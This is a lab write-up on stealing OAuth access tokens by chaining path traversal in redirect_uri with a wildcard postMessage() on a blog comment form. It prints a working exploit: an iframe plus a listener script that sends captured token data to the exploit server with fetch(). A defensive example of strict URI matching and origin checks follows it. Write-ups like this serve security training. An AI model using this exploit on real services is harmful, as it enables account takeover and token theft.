Lab link.
First, we check if redirect_uri has a defense against path traversal.
Browse the other pages and follow the requests made by the comments section of the blog page: window.location.href and postMessage() are used in the comment form script. window.location.href contains the current URL of the browser, including any fragment. postMessage() is the browser API for passing messages between windows, such as a page and the iframe that embeds it (WebExtensions use the same mechanism between content scripts and background scripts). Here the postMessage() call in the comment form script sends the message to any origin, so whatever page frames the comment form receives it. We will try to steal tokens using this.
In the GET /auth?client_id request we copy the URL and create an iframe on the exploit server. Here we take advantage of the path traversal in the redirect_uri parameter and append /post/comment/comment-form to it. After the iframe we need to add a script that listens for the messages and outputs them.
This script sends an HTTP GET request to the exploit server, with the received message data in the path, whenever a message is received:
<script> window.addEventListener('message', function(e) { fetch("/" + encodeURIComponent(e.data.data)) }, false) </script>
We install the exploit, obtain the access token and solve the lab.
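The two weaknesses the lab chains are a redirect_uri check that tolerates path traversal and a postMessage() call with a wildcard target. The following is an added example (not code from the lab or the write-up) showing the loose prefix check beside a strict comparison, and the comment form's message sent to a named origin instead of "*"; the registered callback URL and the origins are assumed placeholders.

```javascript
// Added example, not part of the original write-up. Registered callback URL
// and trusted origin are assumed placeholders for illustration.
const REGISTERED_REDIRECT_URI = "https://client.example/oauth-callback";

// Weak: accepts any string that merely starts with the registered URI, so
// ".../oauth-callback/../post/comment/comment-form" passes and the browser
// later resolves the ".." to a different page on the client's origin.
function prefixMatchRedirectUri(candidate) {
  return candidate.startsWith(REGISTERED_REDIRECT_URI);
}

// Strict: parse both sides and require an identical normalized URL.
// new URL() resolves ".." segments, so the traversal above becomes
// "https://client.example/post/comment/comment-form" and is rejected.
function strictMatchRedirectUri(candidate) {
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch {
    return false; // not a valid absolute URL
  }
  return parsed.href === new URL(REGISTERED_REDIRECT_URI).href;
}

// Sender side of the comment form: post the location only to the origin that
// is allowed to embed this page, never to "*". With a wildcard target, any
// framing page (such as an exploit server) receives the URL and the token in
// its fragment.
const TRUSTED_PARENT_ORIGIN = "https://client.example";
function notifyParent(parentWindow, href) {
  parentWindow.postMessage({ type: "onload", data: href }, TRUSTED_PARENT_ORIGIN);
}

// Receiver side: ignore messages that did not come from the expected origin.
function handleMessage(event) {
  if (event.origin !== TRUSTED_PARENT_ORIGIN) return null;
  return event.data.data;
}
```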